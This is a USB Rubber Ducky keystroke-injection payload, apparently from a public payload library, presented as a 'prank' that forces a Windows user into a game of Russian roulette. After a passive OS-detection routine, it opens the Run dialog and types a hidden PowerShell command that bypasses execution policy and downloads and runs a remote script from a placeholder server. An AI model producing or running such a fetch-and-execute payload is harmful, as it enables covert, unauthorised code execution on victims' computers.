Path: blob/master/payloads/library/prank/-RD-Russian-Roulette/payload.txt
2968 views
REM Title: Russian Roulette1REM Author: Phishing Tides2REM Target: Windows 10, 113REM Description: User is forced to play a game of russian roulette4REM Version: 1.15REM Category: Prank6REM Source: https://github.com/Phishing-Tides/Hak5_RubberDucky_Payloads78REM Please replace the link with your .ps1 raw file below9DEFINE #URL https://serveryouown.com/rawfile/russianroulette.ps11011ATTACKMODE HID1213EXTENSION PASSIVE_WINDOWS_DETECT14REM VERSION 1.115REM AUTHOR: Korben1617REM_BLOCK DOCUMENTATION18Windows fully passive OS Detection and passive Detect Ready19Includes its own passive detect ready.20Does not require additional extensions.2122USAGE:23Extension runs inline (here)24Place at beginning of payload (besides ATTACKMODE) to act as dynamic25boot delay26$_OS will be set to WINDOWS or NOT_WINDOWS27See end of payload for usage within payload28END_REM2930REM CONFIGURATION:31DEFINE #MAX_WAIT 15032DEFINE #CHECK_INTERVAL 2033DEFINE #WINDOWS_HOST_REQUEST_COUNT 234DEFINE #NOT_WINDOWS 73536$_OS = #NOT_WINDOWS3738VAR $MAX_TRIES = #MAX_WAIT39WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))40DELAY #CHECK_INTERVAL41$MAX_TRIES = ($MAX_TRIES - 1)42END_WHILE43IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN44$_OS = WINDOWS45END_IF4647REM_BLOCK EXAMPLE USAGE AFTER EXTENSION48IF ($_OS == WINDOWS) THEN49STRING HELLO WINDOWS!50ELSE51STRING HELLO WORLD!52END_IF53END_REM54END_EXTENSION5556GUI m57DELAY 50058GUI r59DELAY 50060DELETE61DELAY 10062STRINGLN powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr #URL)' -WindowStyle Hidden"636465